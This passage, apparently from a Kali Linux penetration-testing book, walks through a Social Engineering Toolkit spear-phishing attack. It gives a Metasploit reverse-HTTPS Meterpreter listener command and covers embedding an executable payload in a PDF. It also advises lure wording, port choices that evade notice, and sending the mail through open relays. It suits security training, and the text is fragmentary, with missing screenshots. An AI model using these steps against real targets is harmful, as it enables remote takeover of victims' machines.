The Social
Engineering Toolkit (SET) license agreement states that SET is designed purely for good and not evil. Any use of this tool for malicious purposes that are unauthorized by the owner of the network and equipment violates the
terms of service (TOS) and license of this toolset. To find this tool, go through the menu Kali Linux | Exploitation Tools | Social Engineering Toolkit, or type setoolkit
on the command line:
This is going to be a Metasploit reverse HTTP exploit, so there are a couple of steps that you have to put in place before using SET:
Start the Metasploit service.
In Kali 1.x, this was two steps, but in Kali 2.0, the previous image, starting the service, and the next image, opening the Metasploit Framework Console, are one command:
msfconsole
at the command prompt, avoiding the GUI menu altogether.Type the following command in the msf command prompt:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 10.0.0.2 set LPORT 4343 exploit
The listener is an open running process, and so the cursor does not return to the ready state. To evidence that the listener is active, we can run a port scan against it with NMap:
On the other side, the listener responded to the NMap scan with a readout of the data from the scan:
Using the following diagram, we can see that the source of the scan is marked by the listener, and all the scan requests are recorded as coming from 10.0.2.15, which is the internal IP of the Kali machine:
The malware we are going to create will be an executable file wrapped in a PDF file. This will be an attachment on an e-mail that is from a purportedly safe source, to an identified systems administrator in the target company. We will start with a review of the menu structure of SET.
The main menu has six entries and an exit cue:
Under Social-Engineering Attacks, there are eleven entries:
Using Spear-Phishing Attack Vectors, there are four options:
Since we are going to set up a persistent threat that lets us stay in command of the victim's machine, and have to overcome a user's possible reluctance to double-click an attachment, we have to create an irresistible Spear-Phishing mail piece. To do this properly, it is important to have done effective reconnaissance ahead of time.
Company address books and calendars are useful for creating the urgency needed to get an e-mail opened. Just like with marketing by e-mail, either legitimate or spammy, a spear-phishing e-mail title has to be interesting, intriguing, or frightening to the victim:
This e-mail is short, interesting, and can create urgency by greed. The attachment could be any of the following:
The Social Engineering Toolkit gives 21 possible payloads. Some of these will work better on a Macintosh operating systems than Windows Systems. Most Windows workstations are not provisioned to handle RAR-compressed files. The choices here are as follows:
Let's just choose the default, which is item 12. When you hit Enter, the next screen lets you use a doctored PDF file of your own devising, or use the built-in blank PDF. Choosing the second option, we see seven further options:
Since three of the options are going to run code that gets the victim machine to phone home to your Metasploit Framework Meterpreter tool, and you have been practicing with that tool, it might make sense to choose one of those as your evil payload. Let's choose option seven, Windows Meterpreter Reverse HTTPS.
When we type 7
we get several options:
10.0.2.15
.443
is default here, but you can have the listener at any port on your listening device. 443
is the HTTPS port, so it would not look unusual by its number. Port 12234
would look unusual and might also be blocked if the firewall administrators are whitelisting approved ports, and blacklisting all the others./root/.set/template.pdf
directory.This is not what it does. The executable is set as legit.exe
in this case. When you enter the name of the file as in the following image, you need to use the full path:
The mailer will use an open mail relay, if you have found one, a Gmail account, or any legitimate e-mail SMTP server. SET does not contain its own SMTP server. You might want to find a free e-mail service that you can use for this purpose, or use an open relay mail server.
SE Toolkit allows you to choose several different tasty e-mail subjects for your Phishing e-mail attack, and you can easily add new templates to customize the approach. The fourth choice in the list below is the one we just created:
<[email protected]>
and sent the e-mail to <[email protected]>
, and the send worked:3.144.38.92